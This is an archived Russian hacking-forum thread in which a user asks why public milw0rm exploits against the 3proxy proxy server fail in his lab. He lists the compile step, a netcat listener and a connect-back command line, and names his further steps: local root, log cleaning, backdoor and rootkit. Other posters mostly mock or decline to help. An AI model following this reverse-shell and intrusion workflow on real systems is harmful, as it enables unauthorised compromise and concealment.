PDA

Просмотр полной версии : Не пойму причину неработоспособности эксплота для 3proxy 0.5.3g


AlterEgo
27.12.2007, 04:10
Сам код эксплоита: h_ttp://milw0rm.com/exploits/3829
Тестил в локальное сети.
192.168.2.6 - адрес 3proxy сервера (gentoo 2007, 2.6.23)
192.168.2.3 - адрес атакующего

1. gcc exp.c -o exp
2. nc -l -p 56789
3. ./exp 192.168.2.6 3128 192.168.2.3 0
после выполнения сплоит выдает
attacker host, check it up, now!

И в итоге нихрена - нет какт молчит команды не выполняет? в чем трабл - что я делаю не так?
__________________________________________________ __
Так же пробовал другой эксплоит... h_ttp://milw0rm.com/exploits/3821

с ним таже ситуация - не работает!
И вообще в случае с этим сплоитом нужно ли выполнять nc 192.168.2.6 <забинденный порт?> или сплоит автоматом биндит, бэкконектится и предоставляет шелл?

KEZ
27.12.2007, 04:17
ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!

krypt3r
27.12.2007, 08:29
Вообще софт должен писаться под существующие эксплойты. Разработчики должны были на milw0rm сходить, посмотреть коды эксплойтов для их программного продукта и уже в соответствии со сплойтами писать свою программу так, чтобы сплойты работали сразу же после скачивания и хацкеру не нужно было даже лезть в исходник :)

AlterEgo
27.12.2007, 08:31
ДА! И правда!! Вот какого хера они неправильно и криво пишут свои 3proxy, что эксплойты не работают против них! В СУД ПОДАТЬ!!!

Ну есть же в паблике эксплоиты работающие сразу! Ясно - что в исходнике этого эксплоита есть бага - Если кто знает подскажите где! Было бы очень кстати :)

AlterEgo
27.12.2007, 08:34
to krypt3r:

лучше бы по существу что написал... где кривожопность сплоита убрать что бы пахал. :)

_Great_
27.12.2007, 08:56
Если кто знает подскажите где! Было бы очень кстати
А в чем смысл оставлять чтобы подсказывать?
Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)

AlterEgo
27.12.2007, 09:26
Опять будут кривожопые скрипткиддисы хакать все подряд (ничего личного)

Да ты прав, с одной стороны! Это простая как гвоздь истина... Но помошь благое дело! К тому же когда кидисы были пробемой :) на то они и кидисы емае ...

spider-intruder
27.12.2007, 10:45
>>>К тому же когда кидисы были пробемой


ВСЕГДА!!!

П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?

AlterEgo
27.12.2007, 11:02
>>>К тому же когда кидисы были пробемой

ВСЕГДА!!!

Т.е. ты говоришь что кидисы представляют опасность :) да ну - имхо бред... Как таковой они угрозы не представляют... сам же знаешь что сплоиты почти все с багами выкладывают...:) ладно не суть!

П.С. - не думал о том что сервис может быть патченый админами которые тоже знают что такое МИЛВОРМ?
ну зачем так бонально то?! :) Я вкурсе что пропатчили - итд... У меня цель другая: В универе препод дал задание - в локальной сети из 2, 3 продемонтсрировать реальный взлом... Сначала удаленно получить права(не рутовские ясно дело), потом порутать локальным эксплоитом... Почистить логи - бэкдор поставить , руткит для полноты счастья..
Local Root exploit я нашел, работает на ура через багу vixie-crond на ядре 2.6.16.15... Остаьное тоже все есть и работает как надо... Осталось только найти работающий удаленнй эксплоит под любой демон,и который возвращает шелл или биндит его хотябы...